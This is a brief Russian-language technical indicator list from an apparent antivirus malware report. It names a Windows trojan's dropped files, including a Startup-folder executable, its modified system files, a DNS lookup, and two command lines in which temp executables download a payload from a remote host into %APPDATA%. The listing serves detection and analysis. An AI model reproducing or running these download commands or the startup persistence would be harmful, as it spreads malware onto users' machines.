Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\adb9_32.exe
- %WINDIR%\explorer.exe
- <SYSTEM32>\dwm.exe
- %TEMP%\win4e8d.tmp
- %TEMP%\win64ec.tmp
- DNS ASK co######.#ublicdirectoryfiles.com
- '%TEMP%\win4e8d.tmp' "http://core2880.publicdirectoryfiles.com/stat/action3.cgi?p=1&a=2880" "%TEMP%\win4D64.tmp" 1
- '%TEMP%\win64ec.tmp' "http://core2880.publicdirectoryfiles.com/stget2.cgi?host=host&id=2880" "%APPDATA%\wpp.exe" 1